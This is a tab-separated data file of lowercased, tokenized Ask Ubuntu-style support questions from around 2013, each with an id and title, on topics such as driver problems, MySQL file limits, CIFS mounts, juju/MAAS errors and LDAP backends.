288447	can not install win xp over ubuntu	i had a toshiba satellite a200 laptop with 320 gb hdd and vista os and i wanted to replace it with ubuntu 12.10 , but when i did that it turns out that ubuntu erased all the data on my hdd and only showed it as 198 gb in the file system with about 120 gb just disappered after a hard time i managed to use testdisk from the live cd to recover some of the important data from the hdd and transfered them to my pc now what i am planning to do is : 1- install winxp over ubuntu ( keeping only xp on the laptop ) and formatting the hdd to get back all the 320 gb 2- then i 'll try some of the applications made for windows to recover my lost partitions ( hoping it will work and i can get back my lost data ) 3- after that i will upgrade to windows 7 the problem that i 'm facing now is : when i try to install winxp , the installer say that it ca n't find the hdd and the installation stops i searched alot and some solutiuons suggests using gparted from the livecd to format the hdd to ntfs and others suggests putting the hdd drivers with the xp installation cd with nlite ( which is a hard solution for me ) but there is a solution that i found that worked for many toshiba laptops is to get into the bios menu . then scroll down to the sata option and change it from achi to compatibility then i can install winxp and then change it back after that so now please please help my with simple steps to do what i am planning to do and get back my laptop running windows with all my 320 gb and working as it was without problems and please note that i 'm not an expert and english is not my first language : ( thanks in advance for your much appreciated help .
288454	ubuntu 13.04 on mac mini 6,2 ethernet port broadcom netxtreme bcm57766 not detected	the said network adapter is not recognized in 13.04 . in 12.04 and 12.10 i had used the driver proposed from broadcom download site , configured as dkms package it was always updated . on the 3.8.x kernels this provided kernel driver from broadcom does not compile anymore - and the distribution provided tg3 drivers does not recognize the ethernet adapter - even though it is a newer version . ~ $ modinfo /lib/modules/3.8.0-19 generic/kernel/drivers/net/ethernet/broadcom/tg3.ko | grep -i version version : 3.128 srcversion : d737202366709fe01964bf0 vermagic : 3.8.0-19-generic smp mod_unload modversions here the working version on kernel 3.5.x using dkms ~ $ modinfo /lib/modules/3.5.0-25-generic/updates/dkms/tg3.ko | grep version version : 3.124c srcversion : d01ed9a7bf2c3956e212a63 vermagic : 3.5.0-25-generic smp mod_unload modversions the network card : ~ $ lspci -nn | grep 0200 01:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm57766 gigabit ethernet pcie [ 14e4:1686 ] ( rev 01 ) as found on the i7 mac mini 6,2 . anyone knows where i can get a kernel that recognizes that ethernet device ? that chip is supported somehow ... and - the 3.8.x kernel is way better on the hd4000 chip - reason i use it . note - to get the wifi working , just make sure you load the b43 driver at boot ( /etc/modules ) . at least then you have network connectivity .
288459	gmate install fail	i 'm looking to install gmate to allow use of gedit for ruby development . currently i 'm running ubuntu 13.04 x64 . i can add the required repository but when i `` apt-get update '' the following error is given : w : failed to fetch http : //ppa.launchpad.net/ubuntu-on-rails/ppa/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ubuntu-on-rails/ppa/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . any help would be appreciated . thanks .
288460	startup applications can be run on the login screen stack without logging in ?	i 'm going to set up my computer to be turned on at night and it will automatically start downloading . for security reasons , i do not want to set up ubuntu to automatically login ! the problem is login screen that i should type the password manually to enter ! when do applications in start up run ? from login screen or from dektop-rise ? are the software of this list able to run from login screen ( without entering the desktop by password ) , while they are ( previously ) placed in startup ? list : crontab , aria2c , transmission-gtk , shutdown , uget , xdman
288469	what is the shutdown command in 13.04 to display new unity shutdown dialog ?	i want to create a shutdown icon for the launcher in 13.04 . in former versions of ubuntu i used this desktop file and put it in the launcher : [ desktop entry ] name=shut down tryexec=/usr/lib/indicator-session/gtk-logout-helper exec=/usr/lib/indicator-session/gtk-logout-helper -- shutdown icon=system-shutdown terminal=false type=application onlyshowin=unity ; categories=system ; version=1.0 x-ubuntu-gettext-domain=indicator-session what is the shutdown command in 13.04 to display this new unity shutdown dialog ? here is a screenshot with : ps : also this command may be useful to shutdown computer in lircrc file configuration
288471	mysql ca n't open files after updating server : errno : 24	ubuntu : 12.04 lts ( linux mysql02 3.2.0-40-generic # 64-ubuntu smp mon mar 25 21:22:10 utc 2013 x86_64 x86_64 x86_64 gnu/linux ) mysql : ubuntu distro 5.5.31 apparmor : removed ! server has been running rock solid for over a year . then this monday mysql began failing . an update has caused the problem and we can not figure it out what it is . we have even tried to roll back to mysql 5.5.30 but with no luck . we returned at 5.5.31 . mysql error log entries : 130430 7:55:46 [ error ] error in accept : too many open files 130430 7:55:46 [ error ] /usr/sbin/mysqld : ca n't open file : './eci_elite_test/fclvod.frm ' ( errno : 24 ) 130430 7:55:46 [ error ] /usr/sbin/mysqld : ca n't open file : './eci_elite_test/fcnote.frm ' ( errno : 24 ) 130430 7:55:47 [ error ] /usr/sbin/mysqld : ca n't open file : './eci_elite_test/ffcont.frm ' ( errno : 24 ) 130430 7:55:47 [ error ] /usr/sbin/mysqld : ca n't open file : './eci_elite_test/ffcontv.frm ' ( errno : 24 ) 130430 7:55:47 [ error ] /usr/sbin/mysqld : ca n't open file : './eci_elite_test/ffnote.frm ' ( errno : 24 ) 130430 7:55:47 [ error ] /usr/sbin/mysqld : ca n't open file : './eci_elite_test/frcfcl.frm ' ( errno : 24 ) it appears we are running into ulimit problem . we have removed apparmor completely . we have increased the /etc/security/limits.conf and still no luck : # out of desperation ... . * soft nofile 49152 * hard nofile 65536 # no effect ! ? ! ! ? # mysql soft nofile 49152 # mysql hard nofile 65536 and to show the limits.conf is working : root @ mysql02 : /etc/security # ulimit -sa | grep `` open files '' open files ( -n ) 49152 root @ mysql02 : /etc/security # ulimit -ha | grep `` open files '' open files ( -n ) 65536 and here are the important entries in my.cnf [ mysqld_safe ] open_files_limit = 16384 [ mysqld ] open_files_limit = 16384 however : root @ mysql02 : /etc/mysql # mysqladmin -u root -pthepassword variables| grep open_files_limit open_files_limit | 1024 we are totally stumped and down . any assistance would be greatly appreciated .
288474	player to set short-keys for 1-second ahead/back jump ?	i need to transcript to text some recordings and i need to jump back and forth , but sometimes 2-3 secs , sometimes 10 , or more , or less . ( on the long run these differences are not trivial in this type of work . ) i would like to be able to edit these settings , for example , to create a shortkey for a custom length of 1 , 2 or 3 secs . is there a player to permit this ? edit : i guess it would be difficult to find one that allows a large scope of editing , so i will restrict the scope of the question : a player that would allow editable shortkeys for 1-second jump back/ahead .
288478	gmail webapp 13.04	i 've made a clean install of 13.04 64-bit on a dell vostro 3500 i5 4gb ram . the apps are working properly when installed after the firefox requests , only gmail ( which was a troubled app for some systems on previous versions also ) does n't appear on unity and on the messaging menu . i 've tried to reinstall the app via synaptic , but no results . would there already be a way to solve this in 13.04 ? thanks in advance .
288482	a php script that i want it be run by transmission client !	in transmission-gtk there is an option can run script : edit > preferences > downloading > call script when torrent is completed . recently , i found this script that i do not know how to make it work under transmission . according to the program description , the script does not turn off the system , but it can kill transmission after all torrents are done . that 's enough for me because i can chain `` turning off '' to `` closing transmission '' by & & . now , may you , guys , help me to run this php script under transmission ? this is an example mentioned by the script author : php.exe transmission_quit.php -- port=9999 -- hostname=192.168.0.1 ; what does this mean ? ! how should i use it ? should i point it to `` call script when torrent is completed '' option directly ?
288492	incorrect nfs mount entries in ubuntu 12.04.2 lts ?	iâve got the following error message when i try to unmount a nfs share on my ubuntu 12.04.2 lts installation : $ sudo umount /home/ubuntu/nfstest/client /home/ubuntu/nfstest/client was not found in /proc/mounts /home/ubuntu/nfstest/client was not found in /proc/mounts i have used this mount command before : $ sudo mount -t nfs 10.0.3.15 : /foo /home/ubuntu/nfstest/client there is a difference for the mount entry in /etc/mtab : 10.0.3.15 : /foo /home/ubuntu/nfstest/client nfs rw , vers=4 , ... and /proc/mounts : 10.0.3.15 : //foo /home/ubuntu/nfstest/client nfs4 rw , relatime , vers=4.0 , ... in /proc/mounts the mount entry has always two slashes . on an older ubuntu 12.04 lts installation ( without .2 at the end of the version string ) the mount command works as expected and in there is only one slash in the corresponding entry in /proc/mounts .
288494	run system commands from qml app	i want to run a system command from inside my application . it 's suppose to run a command on a remote server using ssh . but that 's not really the point . the point is that i do n't know how to run any kind of command from the app . i asked in the mail list and they referred me to build a qml extension using c++ . but i do n't know c++ and it seems that i have to learn so much only to run a simple command . in python ( as in php ) it 's easy to run a system command . is there any other way of doing it in my touch app , or is there someone that could help me even more ? or perhaps have a better solution to my problem ?
288497	how do i get my shared disk back on line in ubuntu 13.04	i have a folder on my disk which i share over the lan so my wife can do backups to it . it has worked since i can remember . now i 've updated to 13.04 and suddenly i no longer see it or even my computer over the lan . i am referring to file ( or nautilus ) where i press the browse network button . i used to see my own machine and hers , and of course the shared folder . i tried to remove sharing from the file and then reshare it . i did a log out , log in but still no sign of my computer or the shared folder . i see her computer but not my own and of course she fails to see my computer as well . i assume samba is working or i would have received a message when i did the reshare . the problem began after the upgrade to 13.04 . any suggestions ? thanks , ilan
288501	how to set proxy settings in ubuntu software center ?	i have been using windows 7 and to update windows i configured netsh winhttp settings by using command : netsh winhttp set proxy 10.0.0.21:3128 . that worked for windows update and many other softwares . is there a way i can put proxy settings throughout the computer that would work for software center and other softwares ?
288503	vostro 3560 sound is not working after upgrade to ubuntu 13.04 ?	after upgrading to ubuntu 13.04 the sound is not working anymore , in ubuntu 12.10 worked fine . http : //www.alsa-project.org/db/ ? f=70f651a82676b9aab7fef8a8c51b02c5efb9e729 # aplay -l aplay : device_list:252 : no soundcards found ...
288504	why does n't my pppoe connection connect to the internet ?	i have a wired pppoe connection ( a wire comes straight from my windows and connects to cpu ) . this is how i connect in windowsxp dual boot : $ ifconfig -a eth0 link encap : ethernet hwaddr 00:1f : d0 : e9:3b:67 inet6 addr : 2002 : cab3:563b:4:21f : d0ff : fee9:3b67/64 scope : global inet6 addr : fec0 : :4:21f : d0ff : fee9:3b67/64 scope : site inet6 addr : fe80 : :21f : d0ff : fee9:3b67/64 scope : link inet6 addr : 2002 : cab3:563b:4 : e8b4:6af0:2e4f:6792/64 scope : global inet6 addr : fec0 : :4 : e8b4:6af0:2e4f:6792/64 scope : site up broadcast running multicast mtu:1500 metric:1 rx packets:983 errors:0 dropped:17 overruns:0 frame:0 tx packets:40 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:110704 ( 110.7 kb ) tx bytes:8719 ( 8.7 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:144 errors:0 dropped:0 overruns:0 frame:0 tx packets:144 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:10976 ( 10.9 kb ) tx bytes:10976 ( 10.9 kb ) $ ifconfig eth0 link encap : ethernet hwaddr 00:1f : d0 : e9:3b:67 inet6 addr : 2002 : cab3:563b:4:21f : d0ff : fee9:3b67/64 scope : global inet6 addr : fec0 : :4:21f : d0ff : fee9:3b67/64 scope : site inet6 addr : fe80 : :21f : d0ff : fee9:3b67/64 scope : link inet6 addr : 2002 : cab3:563b:4 : e8b4:6af0:2e4f:6792/64 scope : global inet6 addr : fec0 : :4 : e8b4:6af0:2e4f:6792/64 scope : site up broadcast running multicast mtu:1500 metric:1 rx packets:16096 errors:0 dropped:35 overruns:0 frame:0 tx packets:764 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2089011 ( 2.0 mb ) tx bytes:78962 ( 78.9 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:204 errors:0 dropped:0 overruns:0 frame:0 tx packets:204 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:15872 ( 15.8 kb ) tx bytes:15872 ( 15.8 kb ) ppp0 link encap : point-to-point protocol inet addr:111.125.231.234 p-t-p:202.179.72.226 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1492 metric:1 rx packets:668 errors:0 dropped:0 overruns:0 frame:0 tx packets:633 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:502206 ( 502.2 kb ) tx bytes:50026 ( 50.0 kb ) tried with sudo pppoeconf and put my password and username . i tried wired connection and even dsl connection but nothing works . the funny thing was that when i try to call the internet provider they said : `` if you are using linux you must able to solve the problem by yourself '' . somewhere i read that someone edited the ppp.conf file and put in acname= then something like this f10-suhar . i do n't know why but it has worked for him . sudo pppoeconf connection has been set , but it keeps on opening a window with my username & password and asks to connect , but nothing connects .
288511	sd card recognized as mmc not sdx	my sd card if not recognized as dev/sdx , instead it is recognised as dev/mmcblk0 , which i understand is okay . the problem is that i 'm trying to put an angstrom image to my beaglebone and according to the instruction , xz -dkc angstrom-cloud9-ide-eglibc-ipk-v2011.10-core-beaglebone-r0.img.xz > /dev/sdx i 'm supposed to find an sdx that represents my sd card . i 'm new to this so i 'm not sure what 's wrong . any advise is appreciated .
288513	ca n't move files to the trash	when i want to move a file to the trash , nautilus give me an message saying this : you ca n't move example.file to the trash can . do you want to remove it immediately ? i can give you this photo but it 's in spanish
288514	raring does n't give option to run plain text document	i have a line of code saved in a text file on the desktop . in 12.10 there was a popup that asked me what i wanted to do with the file : run | run in terminal | edit | cancel or something similar to that . the file does have `` run as an executable '' checked . now it opens by default in the text editor . : [ how can i get the files to run from the desktop in 13.04 ?
288519	error in installation of adobe acrobat reader - `` the package is of bad quality ''	to install adobe acrobat reader in my ubuntu 13.04 amd64bit i downloaded the .deb installation file from the adobe-website and opened the file using the software center ( as suggested while downloading ) . the installation failed , with the software center warning me that `` the package is of bad quality '' and giving me a long list of details starting with this lintian check results for /tmp/adberdr9.4.2-1_i386linux_deu.deb : e : adobereader-deu : control-file-has-bad-permissions postinst 0555 ! = 0755 e : adobereader-deu : control-file-has-bad-owner postinst acrorel/named ! = root/root e : adobereader-deu : control-file-has-bad-permissions prerm 0555 ! = 0755 e : adobereader-deu : control-file-has-bad-owner prerm acrorel/named ! = root/root e : adobereader-deu : maintainer-address-missing adobe systems , incorporated e : adobereader-deu : wrong-file-owner-uid-or-gid etc/ 10490/25 e : adobereader-deu : wrong-file-owner-uid-or-gid etc/bash_completion.d/ 10490/25 e : adobereader-deu : wrong-file-owner-uid-or-gid etc/bash_completion.d/acroread.sh 10490/25 e : adobereader-deu : wrong-file-owner-uid-or-gid opt/ 10490/25 e : adobereader-deu : wrong-file-owner-uid-or-gid opt/adobe/ 10490/25 e : adobereader-deu : wrong-file-owner-uid-or-gid opt/adobe/reader9/ 10490/25 e : adobereader-deu : wrong-file-owner-uid-or-gid opt/adobe/reader9/browser/ 10490/25 ... going on with a list of details all starting with : e : adobereader-deu : wrong-file-owner-uid-or-gid opt/adobe/reader9/ now i do n't know whether i can install it anyway , ignoring the warning , or how the problem can be solved . does anyone have an idea ? thanks !
288521	change timestamp display in terminal	when i do a ls -al the timestamp display is month date time - would like it to be yy/mm/dd or just know where to modify this ? i also can not edit dconf-editor . - that shows % l : % m % p when i try to change it it just reverts back . i used sudo to launch . desktop shows time only nautilus shows weekday day month year time .
288522	mpls or vpn in ubuntu 13.04 ?	this question has two parts- 1 - at work i have a mpls network setup , where we configure the internet explorer to connect to a gateway server ( i have the url and port ) to enable us to use the mpls connection to link to our work websites . is there a way to get that setup to work in ubuntu so that i can connect to the same mpls network from my home ? 2 - alternatively , we also use the juniper networks vpn utility to connect to the vpn by going to a website and getting some client side software installed . ( netconnect ) i have searched on google and all i could find was the acceptance that getting that juniper network software to be configured correctly and working is difficult . but that was some time ago . has someone tackled that problem ? or can someone help me get it cracked ? alternate softwares/methods that get me connected to the work network are also welcomed .
288527	is it possible to use both sli and two monitors at the same time on ubuntu with nvidia ?	i 'm completely and utterly baffled by my inability to use both sli and a dual monitor setup , even with nvidia 's latest proprietary drivers . now i have to choose between the ergonomic and productive use of more than one monitor or sufficient performance for my games . i could reboot between both settings but i may as well boot into windows then for gaming . just to make clear : i 'm having absolutely no problems enabling sli on its own or setting up both monitors perfectly on their own - i know where these options are and how to use them . i 'm just completely unable to use them both at the same time ! i 'm on ubuntu 13.04 64bit .
288533	dash icons did n't change when upgrading to 13.04	i 've recently updated from 12.10 to 13.04 , and everything is working fine but the icons at the bottom of the dash did n't change . instead of the new ones shown in this link , i 'm still getting the ones from ubuntu 12.10 . tried unity -- reset-icons and setsid unity , but neither of them helped .
288537	mount : unknown filesystem type 'cifs '	for some reason , i can mount my nas using cifs as follows : sudo mount -t cifs //10.0.0.210/data -o username=xxxxxxxxxxxxx , password=xxxxxxxxxxx , rw , nounix , iocharset=utf8 , file_mode=0644 , dir_mode=0755 /mnt/nas but when i enter this into my fstab : //10.0.0.210 /mnt/nas cifs username=xxxxxxxxxxxxx , password=xxxxxxxxxxxxx , rw , nounix , iocharset=utf8 , file_mode=0644 , dir_mode=0755 and i run this : sudo mount -a i get this : mount : unknown filesystem type 'cifs' any help here would be awesome . thanks
288539	libre office ls : error initializing month strings 13.04	i 'm trying to start libre office writer up , but it does n't do anything . i started it from the terminal as root and it showed me this : ls : error initializing month strings /usr/bin/libreoffice : 49 : cd : ca n't cd to lrwxrwxrwx 1 root root 34 ďż˝../lib/libreoffice/program /usr/bin/libreoffice : 156 : exec : /usr/bin/oosplash : not found is there a known workaround for this , becouse my good friend google could n't help , and i also could n't find an answer on this forum . ty guys
288541	13.04 nvidia geforce 8800 gts - no second monitor and other problems	i have spent about an hour trying to find a solution to this , if someone has an answer or a link to an answer i would appreciate it . i just wiped my disk ( formerly running 12.04 lts ) and installed 13.04 . my dual displays were working fine in 12.04 , but when 13.04 came up i lacked my second display in the settings menu and the primary display is labelled `` laptop '' ( i am running on a desktop ) . the only thing i can find when searching for a solution is a stack of complaints about nvidia drivers breaking unity and fixes for that which seem to be removing the nvidia drivers ... so while installing the nvidia drivers seems like a good solution ... it doesnât look like the best course of action . i appreciate any help , if anything is needed from me in order to find a solution please let me know .
288542	xfce4 missing indicator icons for apps	i have had this problem now with two apps , they both use the libappindicator to display their indicator icons ( i believe ) . first time i had this problem was with ubuntuone-indicator app , now i have this same problem with sparkleshare , so i figure it must be related . i just recompiled and installed sparkleshare 1.0 from source last night , thought that might be the problem . still same thing . all works fine in gnome , but once i go into xfce it give me the missing icon problem . could it be as simple as an icon out of place ? if so where do i move the icons to ?
288545	install ubuntu on a second harddrive without messing with other drives or main windows 7 bootloader ?	lets just say i have 3 hard drives : c : 500 gig windows 7 with win7 boot loader d : 1tb nothing on it ( but i want a linux os on it ... ubuntu , debian , fedora ect ) g : 3tb random stuff i want ubuntu and grub on drive d but i want to boot my computer normally and only boot into grub and ubuntu when i do an advanced startup and select an alternative boot device ( the 1tb hard drive ) . is this possible with ubuntu and other linux distributions ? also do all distributions require you to make a linux swap partition ? oh and lastly could i multiboot different distributions such as slackware and archlinux on the d drive and have grub come up with all the os 's on the d drive when i boot from it ? even multiboot stuff like older versions of windows and dos or even hackintosh ? i love os variety ... that 's why i made my osfirsttimer youtube channel ; )
288550	control tab not registering in emacs -nw	i have this in my .emacs which works in x mode . ( global-set-key [ c-tab ] 'next-multiframe-window ) i have tried to m-x global-set-key c-tab but only the tab registers which successfully remaps tab to 'next-multiframe-window
288554	are there any players ( or other programs ) intended for transcription ?	i mean players that include features related to listening to recorded talking for the purpose of putting that into text . one elementary feature would be a somewhat refined way of play/stopping , jumping back and forward with short-keys . more advanced features would be to alter various aspects of the sound in order to understand more complex or badly recorded sounds of voices . ( i would n't mind an answer indicating a sound-to-text program that would automate all that transcription work as well : ) )
288556	how to enable workspace switching selecting app in unity bar ?	before upgrade to 13.04 when i selected an application icon in the unity bar the desktop changed to the workspace in wich that app window was ? now i ca n't do it . how can i enable this option again ?
288559	maas and juju post-bootstrap connection error	i am working with a rather weird issue using maas and juju where after the bootstrap , machine `` 0 '' has been successfully created , i can not deploy any services issuing a simple juju deploy mysql . to give a brief environment overview , i am running maas on ubuntu server 13.04 with the ip 10.0.0.10 and juju and juju-core are running on the same server . this is all run in a localized test lab too . issuing a juju status reveals the following : root @ maas : ~ # juju status 2013-04-30 10:24:32,876 info connecting to environment ... 2013-04-30 10:24:33,439 info connected to environment . machines : 0 : agent-state : not-started dns-name : test4.master instance-id : /maas/api/1.0/nodes/node-ee044686-b100-11e2-9927-52540089abb8/ instance-state : unknown 5 : instance-id : pending services : mysql : charm : cs : precise/mysql-19 relations : { } units : mysql/0 : agent-state : pending machine : 5 public-address : null 2013-04-30 10:24:33,496 info 'status ' command finished successfully the instance remains in a pending state indefinitely and a look at the debug log reveals that a connection is not being made to provision the instance : 2013-04-30 10:27:26,562 : juju.agents.provision @ error : can not get machine list traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/juju/agents/provision.py '' , line 175 , in process_machines provider_machines = yield self.provider.get_machines ( ) providerinteractionerror : unexpected connectionrefusederror interacting with provider : connection was refused by other side : 111 : connection refused . now since this error is being generated on machine `` 0 '' every minute or so , i looked at a tcpdump to try and find out what was happening . after some digging , i came across this at the exact time the error was being logged : 10:27:26.561631 ip 127.0.0.1.33607 > 127.0.0.1.80 : flags [ s ] , seq 1222093882 , win 32792 , options [ mss 16396 , sackok , ts val 454628 ecr 0 , nop , wscale 6 ] , length 0 10:27:26.561651 ip 127.0.0.1.80 > 127.0.0.1.33607 : flags [ r. ] , seq 0 , ack 1222093883 , win 0 , length 0 since machine `` 0 '' was deployed with maas via juju , i do n't think it would be running maas as well . to troubleshoot the issue , i created a ssh tunnel on machine `` 0 '' listening on port 80 ( localhost ) to the maas server port 80 , e.g . 80 : maas-server-ip:80 . after that , juju status changed to show the new machine out of the pending state : 5 : agent-state : not-started dns-name : test5.master instance-id : /maas/api/1.0/nodes/node-fe882bb2-b100-11e2-ba1c-52540089abb8/ instance-state : unknown all this to say , can someone please help me understand why the deployed machine `` 0 '' is attempting a connection to localhost port 80 rather than the maas server ? is this due to the fact i am running juju and maas on the same server ?
288561	calendar application with google sync ?	quick question , i 'm looking for calendar software for ubuntu 13.04 with google sync option , is the any available ?
288563	ldap postgresql backend segmentation fault	i am running the latest version of ldap on xubuntu 12.4 lts and it works pretty fine as long as i use hdb or bdb as the backend . nevertheless when i change the backend to sql and try to restart the slapd service i receive a segfault error . i suppose i still have a very basic understanding problem of how ldap and sql backend works . i would like to know that simply setting the backend to sql in slqpd.conf is enough to connect ldap and the backend or all tables and relationships should be first created ? i am asking this because i first want to make sure that ldap and sql work together then start creating tables and filling in them with data . otherwise i would like to know that the error i receive is because ldap can not at all connect to the backend or because there is no table in the database ? i have followed darold.net tutorial . i have done my installation as follows : first i installed ldap and configured it with hdb and it works very well : ali @ server1 : /sudo apt-get install slapd ldap-utils then i installed postgresql and odbc drivers : ali @ server1 : /sudo apt-get install postgresql ali @ server1 : /sudo apt-get install unixodbc odbc-postgresql then i chnged the postgres password : ali @ server1 : /sudo -u postgres psql postgres postgres= # \password next i modified odbc.ini and odbcinst.ini in /etc/ /etc/odbc.ini : [ odbc data sources ] pgsql=postgresql [ pgsql ] ; warning : the old psql odbc driver psqlodbc.so is now renamed psqlodbcw.so ; in version 08.x . note that the library can also be installed under an other ; path than /usr/local/lib/ following your installation . driver=/usr/local/lib/psqlodbcw.so description=connection to ldap/postgresql servername=localhost port=5432 protocol=6.4 fetchbuffersize=99 username=test password=test database=pg_ldap readonly=no debug=1 commlog=1 [ odbc ] installdir=/usr/local/lib since psqlodbcw.so did n't exist after installation , i copied it manually to /usr/local/lib/ /etc/odbcinst.ini : [ postgresql ] description=odbc for postgresql driver=/usr/local/lib/psqlodbcw.so [ odbc ] trace=1 debug=1 pooling=no then i created a test user and a database : ali @ server1 : /sudo –u postgres psql postgres postgres= # create database pg_ldap ; postgres= # create user test with password ‘test’ ; and i gave the password 'test ' at prompt . postgres= # grant all privileges on database pg_ldap to test ; postgres= # psql pg_ldap < backsql_create.sql postgres= # psql -d pg_ldap < testdb_create.sql postgres= # psql -d pg_ldap < testdb_metadata.sql i also modified slapd.conf : include /usr/local/etc/openldap/schema/core.schema include /usr/local/etc/openldap/schema/cosine.schema include /usr/local/etc/openldap/schema/inetorgperson.schema # define global acls to disable default read access . # define global acls to disable default read access . access to * by self write by * read access to * by dn= '' cn=admin , dc=example , dc=local '' write pidfile /usr/local/var/slapd.pid argsfile /usr/local/var/slapd.args # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # sql database definitions # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # database sql suffix `` dc=example , dc=local '' rootdn `` cn=admin , dc=example , dc=local '' rootpw secret dbname pgsql dbuser test dbpasswd test insentry_stmt `` insert into ldap_entries ( id , dn , oc_map_id , parent , keyval ) values ( ( select max ( id ) +1 from ldap_entries ) , ? , ? , ? , ? ) '' upper_func `` upper '' strcast_func `` text '' concat_pattern `` ? || ? '' has_ldapinfo_dn_ru no lastmod off i tested odbc driver by running : isql -v pgsql test test and it works . here is backtrace of slapd : ( gdb ) start temporary breakpoint 1 at 0x12a86 starting program : /usr/sbin/slapd [ thread debugging using libthread_db enabled ] using host libthread_db library `` /lib/i386-linux-gnu/libthread_db.so.1 '' . temporary breakpoint 1 , 0x80012a86 in main ( ) slapd daemon runs under the user `` openldap '' and group `` openldap '' ldap version : ali @ server1 : /tmp $ slapd -v @ ( # ) $ openldap : slapd ( oct 17 2012 19:48:49 ) $ buildd @ panlong : /build/buildd/openldap-2.4.28/debian/build/servers/slapd i am a beginner and maybe i am making a very basic mistake or forget an important step . any help will be highly appreciated .
288572	adding dropbox space to ubuntu one cloud	i have a lot of gb from dropbox cloud storage space : can i use it to increase my ubuntu one cloud storage space ? and if yes , how ?
288579	no sound after upgrading	it was working perfectly before and after it restarted it 's gone . i need sound desperately since i am recording . i tried typing alsamixer into the terminal as someone suggested but nothing came up .
288581	how to install nvidia 319.12 driver on an optimus system	i have a samsung np550 system with nvidia geforce gt650m . i have installed bumblebee 3.2.1 and `` nvidia-304 , 304.88 , 3.8.0-19-generic '' drivers are loaded for me . however i would like to update to latest 319.12 driver . i heard that this supports optimus natively [ here ] [ 1 ] [ 1 ] : http : //www.webupd8.org/2013/04/nvidia-releases-linux-graphics-drivers.html . how can i install this driver ? ? i am a noob in linux . do i have to remove bumblebee and install it or install it along bumblebee ? ?
288584	files downloaded with ubuntu can not be accesed with win 7	i have a dualboot system with ubuntu and win 7 . after updating ubuntu from 12.10 to 13.04 i encountered some problems : when i download files with ubuntu to a shared ntfs partition , i can not open them in windows 7 . i can see the properties such as size and creation date , but when trying to open it , there is an error dialog : name of directory is not valid . does anybody have a solution ?
288586	python 3.3 not showing in /usr/bin	i run linux mint i downloaded python 3.3.1 and ran : ./configure make make test sudo make altinstall however python3.3 did not show up in /usr/bin , but there is a python3.3 folder in /usr/local/lib alongside python2.7 and python3.2 folders . there is another python3.3 folder in /usr/lib , but it only contains one file which is : /usr/lib/python3.3/lib-dynload/_gdbm.cpython-33m.so . how can i install it so that i can have /usr/bin/python3.3 ?
288588	what 's the best driver for nvidia geforce gt 230 m	i 've installed the new version of ubuntu 13.04 . it works great but i think the system can run more faster with the right driver of my hardware . i actually use the nvidia geforce gt 230 m. i 'm sorry , but my english is as bad as my linux knowledge ; - ) i 'm not sure , which driver i should take . currently the x.org driver is selected but is this the best i can take ?
288605	how can i make the top bar and launcher icons it holds thicker ?	if you 're trying to use the ubuntu-desktop arm image on a touch device ( for example the nexus 7 ) , making the top bar thicker would be a useful user interface tweak . i can already make the unity launcher thick . how do i accomplish the same with the top-bar ?
288610	unable to get sound in headset on ubuntu 13.4	i 've download and installed ubuntu 13.4 mostly every thing work but i have a problem in the sound ! when i run some song the sound work perfectly but when i connect my head set i have no sound running ubuntu 13.4 on hp-pavilion dv6-6c65se best regards. ,
288616	deja-dup says out of space though supposed to clear out older backups	deja-dup backup failed due to out of space condition on backup disk . it is indeed full , but i see many entries older than 1 month even though in the backup settings i indicate to keep backups for `` at least a month . '' the setup dialog says , `` old backups will be kept for at least a month or until the backup location is low on space . '' it seems i should never see the out-of-space message in that case . why is n't deja_dup removing the older files ( > 1 month ) to make space for the new backup ?
288626	run two commands sequentially uisng crontab	my 3-year girl loves supertux . she could n't control the mouse ! so the game should run automatically on startup and after the game , computer should shut down automatically , too . however i put the below command in `` crontab -e '' : @ reboot env display=:0.0 /usr/games/supertux2 & & echo `` password '' | sudo -s shutdown -h now the first part runs the game on an old pc at boot time . i expected the second part of the command can turn off the computer when my girl exit the game . but it ca n't . does not the chain-command a & & b mean when the a finished , start the b ? how can i automate the powering off computer when the game is closed ?
288628	workspace switch hot-keys not working in 13.04 ( but expo does )	i recently upgraded from 12.04 to 13.04 ( through 12.10 ) . i have re-enabled workspaces in appearances/compiz , have a workspace-switcher launcher icon , and can expo with super-s . the keyboard shortcuts tab lists ctrl-alt-arrows as the workspace switch shortcuts , but those hot-key combinations do n't actually switch my workspaces . potentially related : the workspace switcher launcher icon does not accurately reflect windows that are open in workspaces ; there is a default-looking two window image that follows the workspace that i 'm in regardless of the existence of windows in that or other workspaces . i do n't especially care about this functionality , but if it is supposed to be working and is n't , it might stem from the same problem .
